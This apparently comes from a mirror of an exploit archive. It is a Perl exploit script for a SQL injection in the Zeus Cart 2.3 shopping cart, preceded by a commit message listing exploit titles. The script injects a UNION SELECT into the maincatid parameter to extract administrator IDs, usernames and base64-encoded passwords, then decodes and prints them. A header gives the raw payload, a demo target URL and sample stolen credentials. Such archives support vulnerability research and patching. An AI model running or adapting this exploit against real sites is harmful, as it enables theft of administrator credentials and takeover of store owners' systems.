bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/8829.txt
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

163 lines
3.5 KiB
Text
Executable file
Raw Blame History

#!usr/bin/perl
#|------------------------------------------------------------------------------------------------------------------
#| -Info:
#
#| -Name: Zeus Cart V 2.3
#| -Site: http://www.zeuscart.com/
#| -Site Demo: http://www.zeuscart.com/onlinedemo.php?action=skip
#| -Bug: Sql Injection
#| -Found: by Br0ly
#| -BRAZIL >D
#| -Contact: br0ly[dot]Code[at]gmail[dot]com
#|
#| -Gretz: Osirys , xs86 , str0ke
#|
#| -p0c:
#| -SQL INJECTION:
#|
#| -9999+union+all+select+0--
#|
#| - Demo ONline:
#|
#| -> http://ajdemos.com/demo/zeuscart/v23/?do=featured&action=showmaincatlanding&maincatid=[SQL]
#|
#|
#| -Exploit: Demo:
#|
#|perl zeuscart.txt http://ajdemos.com/demo/zeuscart/v23/
#|
#| --------------------------------------
#| -Zeus Cart V2.3
#| -Sql Injection
#| -by Br0ly
#| --------------------------------------
#|
#|[+] Getting the login,pass
#|
#|[+] User = demoadmin
#|[+] Pass = demo123
#|
#|
#| ;D
#|
use IO::Socket::INET;
use LWP::UserAgent;
use MIME::Base64;
my $host = $ARGV[0];
my $sql_path = "/?do=featured&action=showmaincatlanding&maincatid=";
if (@ARGV < 1) {
&banner();
&help("-1");
}
elsif(cheek($host) == 1) {
&banner();
&xploit($host,$sql_path);
}
else {
&banner();
help("-2");
}
sub xploit() {
my $host = $_[0];
my $sql_path = $_[1];
print "[+] Getting the login,pass\n\n";
my $sql_atk = $host.$sql_path."-9999+union+all+select+concat(0x6272306c79,0x3a,admin_id,0x3a,admin_name,0x3a,admin_password,0x3a,0x6272306c79)+from+admin_table--";
my $sql_get = get_url($sql_atk);
my $connect = tag($sql_get);
if($connect =~ /br0ly:(.+):(.+):(.+):br0ly/) {
my $id = $1;
my $user = $2;
my $pass = $3;
if($id =~ /(.+):/) {
my $id_2 = $1;
}
my $pass_aux = base64_decode($pass);
print "[+] User = $user\n";
print "[+] Pass = $pass_aux\n";
exit(0);
}
else {
print "[-] Exploit, Fail\n";
exit(0);
}
}
sub get_url() {
$link = $_[0];
my $req = HTTP::Request->new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return $response->content;
}
sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}
sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.*)/) {
return 1;
}
else {
return 0;
}
}
sub base64_decode () {
my $str_1 = $_[0];
my $str_decode = decode_base64($str_1);
return $str_decode;
}
sub help() {
my $error = $_[0];
if ($error == -1) {
print "\n[-] Error, missed some arguments !\n\n";
}
elsif ($error == -2) {
print "\n[-] Error, Bad arguments !\n";
}
print "[*] Usage : perl $0 http://localhost/zeuscart/\n\n";
print " Ex: perl $0 http://localhost/zeuscart/\n\n";
exit(0);
}
sub banner {
print "\n".
" --------------------------------------\n".
" -Zeus Cart V2.3 \n".
" -Sql Injection \n".
" -by Br0ly \n".
" --------------------------------------\n\n";
}
# milw0rm.com [2009-05-29]
Reference in a new issue View git blame Copy permalink